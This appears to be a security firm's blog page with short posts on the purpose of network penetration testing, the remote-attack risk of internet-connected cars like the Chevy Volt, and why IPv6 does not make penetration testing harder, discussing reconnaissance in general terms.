Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”).  In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks.  Each of the top-level categories can operate in a standalone configuration or can be used to augment the other.  For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone.  Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat.  The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.

PDF Download    Send article as PDF   

Netragard: Connect to chaos

The Chevy Volt will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no less than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firm Netragard, very worried.  Before now, you needed physical access to reprogram the software inside a car: an ‘air gap’ protected vehicles from remote tampering. The Volt will have no such physical defence. Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming ‘hugely vulnerable 5000lb pieces of metal’.

Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.

The full article can be found here.

PDF Printer    Send article as PDF   

Netragard’s thoughts on Pentesting IPv6 vs IPv4

We’ve heard a bit of “noise” about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6.  Lets be clear, anyone telling you that IPv6 makes penetration testing harder doesn’t understand the first thing about real penetration testing.

Whats the point of IPv6?

IPv6 was designed by the Internet Engineering Task Force (“IETF”) to address the issue of IPv4 address space exhaustion.  IPv6 uses a 128-bit address space while IPv4 is only 32 bits.  This means that there are 2128 possible addresses with IPv6, which is far more than the 232 addresses available with IPv4.  This means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.

What about increased security with IPv6?

The IPv6 specification mandates support for the Internet Protocol Security (“IPSec”) protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP Packet. IPSec operates at the Internet Layer of the Internet Protocol suite and so differs from other security systems like the Secure Socket Layer, which operates at the application layer. This is the only significant security enhancement that IPv6 brings to the table and even this has little to no impact on penetration testing.

What some penetration testers are saying about IPv6.

Some penetration testers argue that IPv6 will make the job of a penetration testing more difficult because of the massive increase in potential targets. They claim that the massive increase in potential targets will make the process of discovering live targets impossibly time consuming. They argue that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years.  But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?

The very first step in any penetration test is effective and efficient reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking an enemy.  There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement.  Failure to adapt will result bad intelligence as no two targets are exactly identical.

A small component of reconnaissance is target identification.  Target identification may or may not be done with scanning depending on the nature of the penetration test.  Specifically, it is impossible to deliver a true stealth / covert penetration test with automated scanners.  Likewise it is very difficult to use a scanner to accuratley identify targets in a network that is protected by reactive security systems (like a well configured IPS that supports black-listing).  So in some/many cases doing discovery by scanning an entire block of addresses is ineffective.

A few common methods for target identification include Social Engineering, DNS enumeration, or maybe something as simple as asking the client to provide you with a list of targets.  Not so common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc.  Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.

Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network.  The number of real targets is what is important and not the number of potential targets.  It would be a ridiculous waste of time to test 2128 IPv6 Addresses when only 12 IP addresses are live.  Not to mention that increase in time would likely translate to an increase in project cost.

So in reality, for those who are interested, hacking an IPv6 network won’t be any more or less difficult than hacking an IPv4 network.  Anyone that argues otherwise either doesn’t know what they are doing or they are looking to charge you more money for roughly the same amount of work.

PDF Creator    Send article as PDF   
Return top

INFORMATION

Change this sentence and title from admin Theme option page.